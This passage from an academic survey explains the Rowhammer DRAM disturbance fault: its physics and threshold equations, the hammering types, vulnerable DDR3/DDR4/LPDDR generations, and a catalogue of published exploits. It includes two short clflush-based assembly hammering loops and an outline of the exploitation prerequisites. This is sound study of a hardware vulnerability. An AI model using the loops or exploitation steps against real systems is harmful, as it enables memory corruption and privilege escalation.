The virtual address space is divided into pages, and every virtual memory area must be a multiple of the page size. Both Linux and Windows map the user portion of the virtual address space using 4 KB pages. Linux has 4-level paging from version 2.6.11 onwards for both 32-bit and 64-bit architectures. For a 32-bit architecture, two-level paging is sufficient, and the Linux page folding mechanism simply eliminates the upper and middle levels by making their sizes zero. For a 64-bit architecture, Linux uses four-level paging. In a multitasking OS, a process provides each program with the illusion that it has exclusive use of the system's address space, by using its own private address space that cannot, in general, be read or written by any other process. It is relevant to note that each process can easily use discontiguous physical memory while maintaining the illusion of contiguity in the virtual address space. The range of virtual addresses depends on the computer's instruction set architecture and on the operating system's pointer size, which can be 4 bytes for 32-bit or 8 bytes for 64-bit OS versions. The contents of the memory associated with each private address space have the same general organization, split into two logical regions: kernel memory and process memory. The kernel memory is reserved for the OS kernel's code, data, and stack, typically in the top part of the address space. The bottom remaining portion of the address space is available for the user, with the usual text, data, heap and stack segments. An example of the process address space on x86 is shown in Figure 17. The processor provides a mechanism that restricts the instructions that an application can execute, as well as the address space that it can access.
A process running in user mode is not allowing to directly reference code or data in the kernel area of the address spaces. Instead must access it indirectly via the system call interfaces.

Figure 17 Process Address Space. Figure in [32]


2.8.1 DMA (Direct Memory Access)
DMA (Direct Memory Access) is a feature of modern computer systems that allows other hardware subsystems to access system memory independently of the CPU. It does not involve the system processor and can greatly increase throughput to and from a device by eliminating computational overhead. It is the hardware mechanism in Linux memory management that allows peripheral components to transfer data directly to and from main memory, and it allows the processor to work on its own job while ongoing memory operations are carried out by externally connected devices [26]. Not all memory zones are suitable for DMA: high memory may not work on some systems and with some devices, because the peripheral cannot work with addresses that high. Usually, a specified portion of memory is designated as an area to be used for direct memory access. In the ISA bus standard, up to 16 megabytes of memory can be addressed for DMA. The EISA and Micro Channel Architecture standards allow access to the full range of memory addresses (assuming they are addressable with 32 bits). Device drivers allocate one or more special buffers suited to DMA. When these DMA buffers are bigger than one page, they must occupy contiguous pages in physical memory, because the device transfers data using the ISA or PCI system bus, both of which carry physical addresses. Modules can allocate their buffers only at runtime [26]. In some simple systems, the device can perform DMA directly to the physical address, but in many others there is IOMMU hardware that translates DMA addresses to physical addresses. This is part of the reason for the DMA API: the driver can give it a virtual address, and the API sets up any required IOMMU mapping and returns the DMA address. The driver then tells the device to do DMA to that address, and the IOMMU maps it to the buffer in system RAM.

The DMA-buf API is a generic kernel-level framework for sharing DMA buffers across different devices and sub-systems and for synchronizing asynchronous hardware access. It defines a new buffer object which provides a mechanism for exporting and using shared buffers, and it provides uniform APIs that allow various operations related to buffer sharing.


3 DISTURBANCE MECHANISM ON DRAM AND ROWHAMMER

In the quest to make memories smaller and faster, vendors have reduced the physical geometry of DRAMs and increased the density of the chip. But smaller cells can hold only a lower, limited amount of charge, which reduces their noise margin and renders them more vulnerable to data loss. Also, the closer proximity of cells introduces electromagnetic coupling effects between them, and the higher variation in process technology increases the number of cells susceptible to inter-cell crosstalk. New DRAM technologies are therefore more likely to suffer from disturbance that can go beyond their margins and provoke errors. The existence and widespread nature of disturbance errors in actual DRAM chips was first exposed in [1] in 2014. In this work, the root of the problem was identified in the voltage fluctuation on internal wires called wordlines. Each row has its own wordline whose voltage is raised on row access. Many accesses to the same row force this line to be toggled on and off repeatedly, provoking voltage fluctuations that induce a disturbance effect on nearby rows. The perturbed rows leak charge at an accelerated rate, and if their data is not restored fast enough, some of the cells change their original value. In fact, this vulnerability is present in the majority of recent commodity DRAM chips [1] [2]. It has been proven that repeated reading from the same DRAM address can corrupt data in nearby addresses. When a DRAM row is opened (ACTIVATED) and closed (PRECHARGED) again and again (hammering), it can induce disturbance errors in adjacent DRAM rows. Thus, triggering bit flips is essentially a race against the DRAM's internal refresh: enough memory accesses must be performed to cause sufficient disturbance to the adjacent row before the refresh restores the data in the victim row.
An attacker can therefore cause enough disturbance in a neighbouring row (the victim row) to cause bits to flip by repeatedly accessing the same memory (the aggressor row) fast enough. The disturbance error is produced in a DRAM row when a nearby wordline voltage is toggled repeatedly; the repeated opening/closing of rows, and not the column-read procedure, is responsible for the interference. The research at Carnegie Mellon University [1] demonstrates that this specific disturbance error is a symptom of charge loss. They found that the data loss was only in one direction for each cell, either one-to-zero or zero-to-one, never both. Due to the intrinsic orientation property of DRAM cells, some cells represent a data value of "1" using the charged state (the true-cells) while the others use the discharged state (the anti-cells). There are cases where both orientations are used in distinct parts of the same DRAM module. They proved that true-cells experience only one-to-zero errors and anti-cells only zero-to-one errors. The fact that the observed errors were caused by toggling immediately adjacent rows [1], together with studies of DRAM phenomena such as [33] [34], has been used in [35] to describe the origin of rowhammer in terms of two effects:
 Word Line to Word Line Coupling (WL-WL): Changing the voltage of a wordline can inject noise into an adjacent wordline through electromagnetic coupling and partially enable it, causing leakage in its row's cells. The coupling noise (crosstalk) between word lines increases the sub-threshold leakage current of cell transistors in adjacent rows [33].


The ratio of coupling noise to the stored signal voltage on a non-accessed DRAM cell of a neighbouring row increases with smaller feature size due to this WL-WL coupling.
 Passing-Gate effect: 3D transistors are also susceptible to coupling from adjacent gates, which affects a victim gate. Activating any adjacent gate, whether an active adjacent gate (a gate close to the victim gate using the same active area) or a passing gate (a gate close to the victim that does not use the same active area), changes the electric field around the victim gate. This lowers the threshold voltage and increases the leakage current of victim cell transistors [36].

The main component of the leakage current I_leak is the sub-threshold leakage current I_sub, which can be expressed as a function of ΔV_th-sub, the sub-threshold voltage variation, where n is the body-effect coefficient, q the elementary charge, k Boltzmann's constant and T the temperature:

I_leak ≈ I_sub ∝ e^(q·ΔV_th-sub / n·k·T)

3.1 CHARACTERIZATION OF THE ROWHAMMER PROBLEM
Three parameters characterize the successful flip of a bit in victim rows [8]. The refresh interval (RI) determines how frequently the module is refreshed. The activation interval (AI) is the toggling period and determines how frequently a row is toggled. The threshold number of activations (Nth) is the minimum number of activations that triggers a bit flip. Also, the data pattern, i.e. the data selected for the victim and aggressor rows, influences the activation of the vulnerability. The largest value for the refresh interval (RI) is given by the DRAM chip: it is the longest time for which the chip can guarantee to keep the data without degradation. It is directly related to the retention time limit of the cells (t_ret-th) on the chip (typically 64ms for DDRx and LPDDRx technologies) and is selected at the memory controller (2.2). In [1] it was proven that for shorter RI (at constant AI) there are fewer errors: the victim cell has less time to leak charge between refreshes and a row is opened fewer times, which diminishes the disturbance effect. The capability to induce disturbance errors on a specific system depends on the AI (or toggle rate) in relation to the refresh interval. This refers to how many times a specific row is activated between the refresh commands that recharge the data in each cell. It is related to the t_RC timing constraint defined between a pair of ACTIVE commands to the same row in the same bank by the memory controller (2.5). Generally, the more times a row is opened within a refresh interval, the bigger the probability of bit flips. Thus, reducing the activation interval (AI) increases the errors: a row is opened more times before the data refresh, which increases the disturbance effect. Nevertheless, when the memory access rate passes a certain limit, fewer bits are flipped than in the typical case [37] [2].
The memory controller may reschedule refreshes and memory access commands under heavy memory access conditions. For example, DDR3 standard memory controllers can deprioritize (postpone) refresh commands by up to 64 us in an attempt to minimize request latency under 100% utilization [1]. Then, No Operation instructions (NOP) in each iteration of the loop can sometimes help trigger more bit flips by lowering the access rate to the same address [2]. On the other side, at a sufficiently high

refresh rate, the errors can be completely eliminated, but with a corresponding cost in both power consumption and performance [1] [2] [37] [38].

3.1.1 Mathematical Characterization of the Rowhammering Threshold
The Rowhammering Threshold (RH_th) is the threshold number of activations, within a refresh cycle, required to cause data loss due to rowhammering. The rowhammer threshold is presented mathematically in studies such as [35] [39]:

RH_th = (t_ret-RH / t_ret-th) × M_max

Here t_ret-RH is the time during which a cell in a victim row suffers from rowhammering, t_ret-th is the refresh cycle related to the retention time of the cells in the DRAM, and M_max is the total possible number of activate operations within one refresh interval.

RH_th can also be expressed as a function of the leakage currents, where I_leak-RH represents the leakage current under row hammering. It is the guard-band leakage current (I_leak-GB) increased α (the hammering rate) times under hammering. The guard-band is chosen by manufacturers as a safety precaution to ensure that cell leakage does not cause cells to lose their bit-state naturally. It is expressed as a retention time (t_ret-GB = β · t_ret-th), a safety margin that conforms to the JEDEC refresh standards.

I_leak-RH = α · I_leak-GB

The leakage current can be expressed as:

I_leak = Q/t = (C · V)/t  →  C · V = I_leak · t

Here C is the capacitance of the cell, V is the driving voltage (how much voltage is applied to the capacitor in order to fill it to capacity), Q represents the total charge of the capacitor and t represents a period of time. Then, by dividing the leakage contribution into two time parts and using the previous equations, the retention time at the guard-band can be expressed as follows:

I_leak-GB · t_ret-GB = C · V = I_leak-GB · (t_ret-th − t_ret-RH) + I_leak-RH · t_ret-RH
→ t_ret-GB = t_ret-th + (α − 1) · t_ret-RH

If we express the retention time with guard-band as a function of the threshold retention time (t_ret-GB = β · t_ret-th), then t_ret-RH / t_ret-th = (β − 1)/(α − 1), and the rowhammering threshold (RH_th) can be expressed as:

RH_th = (t_ret-RH / t_ret-th) × M_max = ((β − 1)/(α − 1)) × M_max

where β represents the reduced leakage current after the guard-band is applied and α is the scalar multiplier to the natural leakage current. The Threshold number of Activations (Nth) can be defined as the minimum number of activations required to induce an error when RI is the default value of 64ms. At t_ret-th = 64 ms, M_max ≈ 1.3 million. Then:


N_th = ((β − 1)/(α − 1)) × 1.3M

The research in [40] describes values of α ranging from 4 to 11.7. For example, at α = 11 and β = 2, N_th = (1/10) × 1.3M = 130K. The Nth for each manufacturer is different, with values ranging from 139K to 284K activations [1]. Differently, 2x1M read operations on each aggressor page are necessary to trigger the vulnerability for LPDDR3, LPDDR2 and LPDDR4 on ARMv7- and ARMv8-based devices [2]. The value of α is related to the fabrication process and increases as DRAM scales down. Due to future nanoscale DRAM, the Nth values can therefore be expected to be greatly reduced, down to a few tens of thousands.

3.1.2 Data Pattern and Weak Cells Effect
The victim cell must hold a charged state for the disturbance to affect its value by discharging it. Depending on the specific DRAM cell orientation, this implies either a 1-to-0 or a 0-to-1 error. There are cases where both orientations are used in distinct parts of the same DRAM module. Therefore, the probability of bit flips in a specific row depends on the digital data kept in this row as well as on the orientation of the specific row's cells [1]. When the memory module orientation is unknown before the attack, different data patterns must be tried in the search for rowhammer vulnerabilities on the specific system [1] [41]. Furthermore, the behaviour of most victim cells is correlated with the data stored in some other cells, an N-body phenomenon that involves the interaction of multiple cells. Certain aggressor cells, typically located in aggressor rows, must be discharged to trigger an error. Conversely, the discharging or charging of protector cells, frequently residing in aggressor or victim rows, reduces the probability of an error. Some further sensitive results can be extracted from the studies in [1]. They prove that the errors are mostly repeatable: once a vulnerable memory location has been identified, it is possible to reproduce the bit flip by reading the same set of aggressor pages again. This result has been used extensively by later research in attack implementations, as it provides the attacker with the possibility of exhaustively searching for the location of memory vulnerabilities and then tricking the memory controller into placing the page under attack at the aforementioned vulnerable place [2] [42]. The weak cells are the cells with the shortest retention times; intuitively they would appear to be especially vulnerable to disturbance errors since they are already leakier than others. On the contrary, no strong correlation between weak cells and victim cells was found in [1]. The coupling pathway responsible for disturbance errors may be independent of the process variation responsible for weak cells. Also, the specific disturbance phenomenon is not strongly influenced by temperature.

3.2 TRIGGERING ROWHAMMER
By repeatedly accessing (hammering) the same memory row (aggressor row), an attacker can cause enough disturbance in a neighbouring row (victim row) to cause a bit flip. This can be

software-triggered by using code with a loop that generates millions of reads to two different DRAM rows of the same bank in each iteration. A memory access consists of different stages (2.5). In the ACTIVE stage, a row is first activated to transfer the row's data to the bank's row buffer by toggling ON its associated wordline. Secondly, the specific column of the row is read/written (READ/WRITE stage) from or to the row buffer. Finally, the row is closed by precharging (PRECHARGE stage) the specific bank, writing the value back to the row and switching OFF the wordline. The disturbance error is produced in a DRAM row when a nearby wordline voltage is toggled repeatedly, meaning that it is produced by the repeated ACTIVE/PRECHARGE of rows and not in the column READ/WRITE stage. The code must guarantee that each access corresponds to a new row activation in order to trigger rowhammer. When the memory controller uses an open-page policy (2.5), the most recently accessed row is kept open in a buffer in an attempt to save ACTIVE and PRECHARGE commands when the same address is accessed continuously. Then, if the same physical address is accessed continuously, the corresponding data is already in the row buffer and no new activation is produced. Therefore, in this case, two physical addresses that correspond to rows in the same bank must be accessed, to guarantee that the row buffer is cleared between memory accesses. Code to induce the disturbance on a real system, based on an open-page memory controller policy, was first constructed in [1]. They use a loop that generates millions of reads to two different DRAM rows of the same bank in each iteration, designed to generate a read to DRAM on every data access.
The code consists of two mov instructions that read data from DRAM at addresses X and Y and move it into registers, two clflush instructions that evict both accessed data from the cache, an mfence instruction that ensures that the data is fully flushed before any subsequent memory instruction, and finally a jump back to the first instruction for a new iteration:

code:
  mov (X), %eax
  mov (Y), %ebx
  clflush (X)
  clflush (Y)
  mfence
  jmp code

To guarantee direct access to the DRAM, two points of the code are key:
 The two consecutive mov instructions to two different DRAM addresses. If just one address were accessed in each loop, the row would be accessed directly from the row buffer, which does not toggle the wordline and avoids the disturbance effect. The values of X and Y must be chosen correctly so that they map to different rows within the same bank, guaranteeing the eviction of the row buffer on each memory access.
 It is necessary to flush the cache on each iteration so that each memory access reaches the DRAM directly. At the time of the study [1] they simply used the clflush instruction.


On the other hand, recent studies [43] have proposed a new rowhammer method for closed-page memory controller policies. The closed-page policy (2.5) immediately closes the row and precharges the bank to be ready for a new row to open. In this case it is not necessary to evict the row buffer to toggle the row, so a simpler code can trigger the vulnerability:

code:
  mov (X), %eax
  clflush (X)
  mfence
  jmp code

3.2.1 Rowhammer Types
This section overviews the different methods of hammering a vulnerable DRAM according to their memory access pattern. A schematic that compares the three hammering patterns is shown in Figure 18. The rows marked with a hammer are the hammered locations (aggressor rows) and the grey ones are the most likely locations to exhibit bit flips (victim rows). Note that the way hammering is conducted affects the efficiency of flipping bits, so the method used in each case must be cautiously selected depending on the attack environment.

Figure 18 Different hammering strategies. Figure in [44]

3.2.1.1 Single-side rowhammer
Attacks that rely on the activation of just one aggressor row are called single-side rowhammer. The single-side rowhammer approach has been used in probabilistic attacks. In this case, it is enough to know the row size so that addresses in the same bank can be found [1] [45] [46] [47]. The X and Y values just need to map to different rows within the same bank to be able to evict the row buffer and access the row in RAM directly on systems with an open-page memory controller policy. Note that such a pattern hammers the victim row from one side only, which is generally flexible but slow. A challenge to consider is the need to find physical addresses that map to rows of the same bank. Early projects confronted this challenge by picking random addresses, following probabilistic approaches [1] [45] [46] [47]. If single-sided hammering uses a set of unrelated addresses and accesses them at high frequency, the probability that two addresses map to the same channel, rank, and bank is 1/(C·R·B), where C is the number of channels, R is the number of ranks, and B is the number of banks [48]. Some attacks increase the efficiency of triggering bit flips by finding out beforehand the rows that belong to the same bank, using the different techniques described in section 4.1.2.


3.2.1.2 Double-side rowhammer
The double-side rowhammer attack aims to improve the effectiveness of the attack on open-page memory controller systems. The method targets a specific memory row and hammers its two neighbouring rows (two aggressor rows), the ones above and below the victim row in physical memory. It can guarantee a reproducible bit flip, on vulnerable DRAM memory, for a specifically chosen victim address location [2] [37]. Such attacks require knowledge of the physical memory mapping of the DRAM to be able to identify the addresses of the neighbouring rows. The attack is mounted by carefully choosing the X and Y values: they must correspond to the physical rows above and below the victim row in the DRAM. The physical address bits that correspond to each row, bank, DIMM (Dual In-line Memory Module) and memory channel have to be understood in order to perform the deterministic double-side rowhammer [2] [37] [49]. Note that these system specifications are commonly proprietary and closed. Double-side hammering is the most efficient way to perform rowhammer, but more complex research regarding the memory architecture of the system under attack must be carried out in order to correctly choose the 3 adjacent rows. In the double-side rowhammer attack, the exact physical address mapping of all the banks should be known, to access both rows directly above and below the victim one [2] [37] [49].

3.2.1.3 One-location hammering
One-location hammering is a recent attack primitive presented in [43] in 2018. This technique hammers only one memory location: the attacker does not directly induce row conflicts to evict the row buffer but only re-opens one row permanently. It can be applied to modern systems that employ more sophisticated memory controller policies (closed-page policy), which pre-emptively close rows earlier than necessary to optimize performance (2.5). With one-location hammering, the attacker only runs a Flush+Reload loop on a single memory address X at the maximum frequency. This continuously re-opens the same DRAM row whenever the memory controller closes it. This method does not need any knowledge regarding the physical address mapping, and does not even need to find addresses in the same bank. Since the attack does not access different rows in the same bank, it bypasses the rowhammer defences based on detection through analysis of memory access patterns (5.3), such as the one proposed in [49]. On the other hand, although it has been observed that one-location hammering drains enough charge from the DRAM cells to induce bit flips, the percentage of bits that can be flipped is lower than with double-sided and single-sided hammering. The research in [43] presents a comparison of the effectiveness of the three rowhammer methods. They performed a test on a Skylake i7-6700K with 8GB Crucial DDR4-2133 DIMMs that scans the percentage of bit flips during an attempt to hammer random memory locations. They compare the bit flip distribution over 4kB-aligned memory regions between double-side hammering, single-side hammering, and one-location hammering. It is observed that the flipped bit offsets are slightly more uniform for single-side hammering (78.5%) than for double-side hammering (77%) and much worse for one-location hammering (36.5%). Usually, the one-location hammering type is weaker and slower than the other two types, but it is much stealthier as it requires no privileges.


3.3 VULNERABLE DRAM TYPES
The vulnerability exists in the majority of commodity DRAM chips, being more prevalent in 40 nm memory technologies. In the work of Carnegie Mellon University [1] the error was present in 110 DDR3 DRAM modules on x86 processors, including modules from all manufacturers from 2013 to 2014. They used an FPGA-based experimental DRAM testing infrastructure, originally developed for testing retention time issues in DRAM, with a DDR3-800 DRAM memory controller and a PCIe 2.0 core. The experiment was conducted inside a heating chamber at 50 ± 2ºC. Of the 129 DDR3 DRAM modules tested, manufactured by 3 different major manufacturers (A, B, C) in the years from 2008 until 2014, 110 exhibited rowhammer errors. Figure 19 shows their results categorized by manufacturing date [50]. Note that all modules from 2012-2013 are vulnerable.

Figure 19 RowHammer error rate vs. manufacturing date. Figure in [50]

In May 2014 Samsung announced that their DDR4 memory would not be susceptible to rowhammering because they implement Targeted Row Refresh (TRR), which enables the memory controller to refresh rows adjacent to a certain row (5). They announced that it was implemented in all DDR4 modules, but it has since been removed from the DDR4 standard. Thus, even if a manufacturer still chooses to implement it in their devices, it will not be effective if the memory controller does not support it [51]. In [3] a fully automated JavaScript attack was implemented to trigger faults on remote hardware. The attack was successful on Sandy Bridge, Ivy Bridge, Haswell, and Skylake, in various configurations of not only DDR3 but also DDR4. The Crucial DDR4 DIMMs are vulnerable at the default system settings. On the other hand, the G.Skill DDR4 DIMMs show bit flips only at an increased refresh interval. This shows how much the vulnerability still crucially depends on the refresh interval chosen per DIMM. Based on the aforementioned results [3], Lanteigne performed an analysis on DDR4 memory [52] in March 2016, proving that rowhammer is certainly reproducible on that technology too. In the experiment they used their own tool called Memesis, a Linux-kernel-embedded enterprise memory test which pushes extreme levels of stress and bandwidth between the processors and memory while looking for data corruption and ECC events. They

tested across a variety of x86-64 laptops, desktops and dual-processor ECC-protected server systems. Of the 12 modules under test, which included Intel Skylake based systems with Crucial Ballistix Elite 2666 MHz, Geil Super Luce 2400MHz, G.Skill Ripjaws 4 3200 MHz and Micron-branded 2133 MHz DDR4 memory modules, 8 showed bit flips under the default refresh rate during the 4-hour experiment. A memory scanning tool was used in [41] to test the rowhammer vulnerability of individual DIMMs at default settings. The test consists of a double-side rowhammer attack with a default random pattern, run for four hours on each DIMM individually. Of the 12 memory modules, eight showed bit flips. Every memory module that failed at the default refresh rate setting was DDR4 silicon manufactured by Micron. Some of the Samsung silicon memory modules showed a small number of bit flips at a 25% refresh rate reduction. In August 2016 the DRAMA attack was presented [37]. They managed to implement a double-side rowhammer attack that flips bits in less than 16 seconds on a Crucial DDR4-2133 memory module running at the default refresh interval, and needed only some minutes to flip bits on the Skylake G.Skill F4-3200C16D-16GTZB DDR4 memory, until then considered not vulnerable. In addition, bit flips have been achieved on DDR4 technology by different attacks, such as the Good go Bad rowhammer attack [53], which flipped bits on Broadwell DDR4 at double refresh time. Furthermore, a recent rowhammer attack for mobile platforms has demonstrated [2] that the majority of LPDDR3 devices (Low Power DDR memory devices) under test are vulnerable and that even LPDDR2 is sensitive, on ARMv7-based processors. The LPDDR4 standard specifies two features to eliminate the rowhammer bug: not just TRR but also the Maximum Activation Count (MAC) technique, which specifies how often a row can be activated before its neighbouring rows must be refreshed. Even then, [2] achieved bit flips on a Google Pixel phone with 4 GB of LPDDR4 memory.


4 ROWHAMMER EXPLOITATION

A fundamental assumption in software security is that a memory location can only be modified by a process with write permissions to that memory location. Disturbance errors violate the memory protection invariants that must be guaranteed: a read access should not modify data at any address, and a write access should modify data only at the address being written to. A row that is repeatedly opened by read or write accesses induces disturbance in rows other than the ones being accessed. Furthermore, code that merely accesses its own pages could corrupt pages belonging to other programs, since the memory controller can map different rows to different software pages. Hardware fault attacks typically need to expose the device to specific physical conditions outside of its specification, which requires physical access to the device under attack. Through a rowhammer attack, however, hardware faults are induced by software without the need for direct physical access to the system. Triggering the rowhammer bug is different from exploiting it. Most bits in memory are irrelevant to an attacker, as flipping them would often just cause memory corruption without obtaining any concrete security advantage. For successful exploitation, the attacker has to face the following challenges:
 The attacker needs to know some memory architecture details in order to access rows of the same bank in the simplest attacks (single-side rowhammer and one-location rowhammer) or, even better, to be able to allocate contiguous physical blocks for the double-side rowhammer. Contiguous physical blocks allow accessing virtual addresses that correspond to the two physical rows adjacent to the victim. Section (4.1) presents the memory information necessary for the different attacks and various ways to find it.
 The attacker must access the DRAM chip directly and fast enough. The ability to make row activations fast enough is a prerequisite for triggering the bug, so that the flips are produced before the refresh restores the victim cells. The CPU (Central Processing Unit) memory controller must be able to issue memory read commands fast enough to the DRAM chip. Apart from a sufficiently fast processor clock, in general the biggest challenge is bypassing the several cache layers that mask out the CPU memory reads. It is thus necessary to bypass the CPU cache (2.6) or use DMA memory (2.8.1) to make sure that each memory read access propagates to the DRAM. Section (4.2) describes several techniques to achieve uncached memory access.
 The attacker must be able to land a security-sensitive memory page (e.g., a page owned by the operating system or by another privileged process) in a vulnerable physical memory page. Section (4.3) depicts different ways to learn where to hammer.
Finally, the challenges of triggering rowhammer in a security-relevant manner are summarized in different categories depending on the attack interfaces (4.4) used to exploit the vulnerability and the attack targets (4.5). The performed rowhammer attacks, described in the subsections below, are the following:


 The GoogleProject0 attack [45] was the first demonstrated practical rowhammer attack. It is a single-side rowhammer (3.2.1.1) attack implemented on the x86-32 or x86-64 architecture based on the use of CLFLUSH instruction. It sprays security-sensitive pages all over the memory and expects the flip bit luckily falls in an exploitable position.  The Non-temporal Rowhammer [47] attack proposes an approach for rowhammer that is based on x86 non-temporal instructions and that can be implemented for scape NaCl sandbox by using the same strategy than at GoogleProject0 attack [45] without the use of CLFLUSH instructions.  The Curious Case of Rowhammer [54] attack demonstrates the feasibility of inducing bit flip faults in RSA Cryptosystem key by using a realistic number of hammering attempts. It is a probabilistic approach that aims firstly to find out where is keeping the key and then, expects to trigger a flip bit luckily in the specific physical memory location.  Dedup est Machina [46] is an attack that combines a memory deduplication-based primitive with a reliable single-side rowhammer exploit to gain arbitrary memory read and write access in the Microsoft edge browser. Using cache eviction set specifically created for Windows OS.  The Flip Feng Shui [42] is an exploitation vector which induces bit flips over arbitrary physical memory in a controlled and deterministic way by exploiting the memory deduplication feature to control the physical memory layout. The attack aims to gain unauthorized access to a co-hosted victim VM (Virtual Memory) on a cloud.  The One Bit Flips, One Cloud Flop [55] is a cross-VM rowhammer attack in which a malicious VM client exploits the induced bit flips to crack Xen Virtualization memory isolation. The attack wins access to a forbidden physical memory location on the shared machine. In order to trigger the double-side rowhammer implement a technique to determine the physical address mapping in DRAM modules at runtime. 
 The DRAMMER [2] attack is a double-side (3.2.1.2) rowhammer attack on Android/ARM mobile platforms that uses DMA (2.8.1) to bypass the CPU cache. It is a deterministic approach that exploits the predictable memory reuse patterns of standard physical memory allocators. It exploits the contiguous ION heap that was available from Android 4.0 until the Android security update of 2016. More details are provided in section (6.3).  The SGX-Bomb [56] attack launches rowhammer against Intel SGX enclave memory to trigger the processor lockdown. A cloud client can mount a DoS attack by shutting down servers shared with other clients.  Another Flip in the Wall [43] flips opcode bits in a predictable and targeted way by using a new one-location hammering technique (3.2.1.3) on the x86 architecture. The attack uses the memory-waylaying technique, which exploits system-level optimizations and side-channel attacks to place the target page in a vulnerable physical location. They exploited it through DoS (Denial of Service) attacks and system privilege escalation attacks.


 The GLitch attack [57] [58] is an effective GPU-based (Graphics Processing Unit) microarchitectural attack. It uses primitives exposed to the web through standardized browser extensions and leverages the possibility of triggering side-channel and rowhammer attacks from JavaScript. The end-to-end attack compromises the Firefox JS sandbox on Android platforms by obtaining arbitrary read/write permissions that enable remote code execution.  The Throwhammer attack [59] triggers and exploits rowhammer bit flips directly from a remote machine by only sending network packets over RDMA-enabled (Remote Direct Memory Access) networks, and is used to gain code execution on a remote key-value server application.  The RAMpage attack [60] is a DMA-based rowhammer attack against the latest Android OS for mobile platforms. It aims to escalate privileges to root or to compromise other apps present on the device. It is an improvement of the DRAMMER [2] attack that attempts to bypass the rowhammer countermeasures applied in newer Android OS versions. It reserves memory blocks in the ION system-heap memory pool in a clever way that enables the exploitation techniques used in DRAMMER.  The PFA [61] is a rowhammer-based PFA (Persistent Fault Attack) on a T-box AES implementation that can be triggered remotely. It injects persistent bit faults into the T-tables of the Libgcrypt shared-library binary file. They validate their attack in an FPGA environment by targeting a hardened AES-128 implementation to recover the last round key.  The Nethammer [62] is a remote rowhammer attack that does not rely on any attacker-controlled code on the victim machine; it relies only on sending a stream of network packets to the target device. It mounts one-location or single-side rowhammer by exploiting quality-of-service technology deployed on the device, for x86, ARM, and clouds. 
 The Still Hammerable attack [63] is a novel exploit that aims to defeat the latest rowhammer countermeasure, called CATT (5.3). The exploit uses double-owned kernel buffers, owned concurrently by the kernel and the user domains, to invalidate the physical separation enforced by CATT. The attack gains both root and kernel privileges on x86 systems using single-side rowhammer. We also reference some interesting research works that do not present complete end-to-end attacks but introduce crucial tools that establish new advantages in the rowhammer field.  The Rowhammer.js [3] attack is a JavaScript implementation of rowhammer that induces hardware faults from remote software using cache eviction strategies. Notice that it is not an end-to-end attack, just a technique to trigger the vulnerability remotely.  The DRAMA [37] study proposes two reverse-engineering methods for mapping memory addresses to DRAM channels, ranks, and banks. These DRAM mapping techniques improve rowhammer attacks and enable, for the first time, practical rowhammer attacks on DDR4.


 ANVIL [49] introduces a clflush-free technique to trigger rowhammer. It bypasses the CPU cache by manipulating the cache replacement state. The technique achieves bit flips even under a doubled refresh rate.  The Good go Bad [53] attack is a virtual-memory cache-flush method that triggers rowhammer on systems with a doubled refresh rate. It takes advantage of the Cache Allocation Technology (CAT) mechanism, designed in part to protect virtual machines from inter-VM DoS attacks, to accelerate rowhammer attacks.

The rowhammer method used by each attack is summarized in Table 5.

Rowhammer Type                  single-side RH   double-side RH   one-location RH
GoogleProject0                        ✓
Non-Temporal Rowhammer                ✓
A Curious Case of Rowhammer           ✓
Dedup Est Machina                     ✓
Flip Feng Shui                                         ✓
One bit flip, one cloud flop                           ✓
DRAMMER                                                ✓
SGX-Bomb                                               ✓
Another Flip in the Wall                                                  ✓
GLitch                                                 ✓
Throwhammer                                            ✓
RAMpage                                                ✓
PFA                                                    ✓
Nethammer                             ✓                                   ✓
Still Hammerable                      ✓
Rowhammer.js                                           ✓
DRAMA                                                  ✓
ANVIL                                 ✓                ✓
Good go Bad                           ✓                ✓
Table 5 Rowhammer methods

4.1 UNDER ATTACK MEMORY INFORMATION For probabilistic rowhammer approaches, it is enough to know the row size so that addresses in the same bank can be found to trigger the single-side method (3.2.1.1). On the other hand, knowing which physical address corresponds to each row, bank, DIMM and memory channel is crucial to perform deterministic double-side rowhammer (3.2.1.2). The DRAM address mapping schemes used by the CPU's memory controllers are not publicly disclosed by major chip companies like Intel and ARM; only AMD discloses which bits of the physical address are used to compute the DRAM bank address. With the goal of triggering the rowhammer bug, first of all we have to choose the specific technique that allows us to find the necessary information regarding the physical memory location. A summary of the various techniques used in each attack is shown in Table 6.


Techniques to detect Memory Information
One-location hammer: random access — Same-bank accesses: Pagemap file | Row-conflict side channel — Adjacent-memory detection: Huge page | Physical probe | Reverse engineering | DMA | Row-conflict side channel

GoogleProject0 ✓ ✓
Non-Temporal RH ✓ ✓
Curious case of RH ✓ ✓ ✓
Dedup Est Machina ✓ ✓
Flip Feng Shui ✓ ✓ ✓
One bit flip, one cloud flop ✓ ✓
DRAMMER ✓ ✓
SGX-Bomb ✓ ✓
Another Flip in the Wall ✓
GLitch ✓
Throwhammer ✓
RAMpage ✓ ✓
PFA ✓ ✓
Nethammer ✓ ✓
Still Hammerable ✓
Rowhammer.js ✓ ✓
DRAMA ✓ ✓ ✓
ANVIL ✓ ✓
Good go Bad ✓ ✓
Table 6 Various techniques to learn the required memory information

4.1.1 One-location hammer The one-location hammer type does not need any knowledge of the memory layout to trigger a bit flip. The attacker only needs to access one single location at high frequency on a modern processor, since modern memory controllers no longer use strict open-page policies. On a system whose memory controller uses a close-page policy, the attacker does not directly induce row conflicts; instead, one row is kept permanently re-opening because the memory controller pre-emptively closes rows earlier than necessary. Hence, there is no need to find addresses in the same bank in order to trigger it. This type of hammering is in itself a method to overcome the first primitive in the process of triggering the vulnerability.  The Another Flip in the Wall attack [43] was the first to prove one-location hammering. The attacker just runs a Flush+Reload loop on a single memory address at maximum frequency. They use a prefetch address-translation oracle attack presented at [64] to find out when two virtual addresses map to the same physical address. The technique consists of a sequence of prefetch instructions and a Flush+Reload attack to measure the effect of the prefetch, which requires a highly accurate timing measurement method. It relies on the observation that prefetching addresses that are not mapped to physical pages introduces non-deterministic performance penalties [64].


 The Nethammer attack [62] implements a random one-location rowhammer that is triggered remotely just by sending network packets to the victim system. They make no effort to find out any memory characteristic.

4.1.2 Same bank row detection In single-side rowhammer attacks it is necessary to access addresses that correspond to different rows in the same bank, so that reads are not simply served from the row buffer.

